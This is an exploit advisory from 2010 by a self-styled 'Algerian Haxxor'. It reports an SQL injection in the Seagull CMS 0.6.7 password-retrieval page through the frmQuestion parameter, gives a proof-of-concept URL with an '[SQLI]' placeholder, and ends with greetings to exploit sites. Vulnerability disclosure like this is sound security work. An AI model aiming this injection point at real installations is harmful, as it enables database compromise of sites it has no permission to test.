1 ###################################### 1 0 Sweet the Algerian Haxxor 0 1 ###################################### 0 0 1 1 [+]Exploit Title: seagull-0.6.7 SQLinjection Vulnerabilitie 0 0 [+]Date: 29/08/2010 1 1 [+]Author: Sweet 0 0 [+]Contact : charif38@hotmail.fr 0 1 [+]Software Link: http://seagullproject.org/ 0 0 [+]Download: 1 1 [+]Version: 0.6.7 and lesser 0 0 [+]Tested on: WinXp sp3 1 1 [+]Risk : Hight 0 0 [+]Description : just another CMS 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 SQL injection : in /seagnulPath/www/index.php/user/password with http request editor The POST variable frmQuestion has been set to 1' POC: http://server/index.php/user/password/?action=retrieve&frmEmail=111-222-1933email@address.tst&frmQuestion=1'[SQLI]&frmAnswer=111-222-1933email@address.tst&submitted=retrieve screen shot:http://img163.imageshack.us/img163/3028/imagexp.jpg thx to Milw0rm.com , JF - Hamst0r - Keystroke , inj3ct0r.com , exploit-db.com Saha Ftourkoum et 1,2,3 viva L'Algerie :))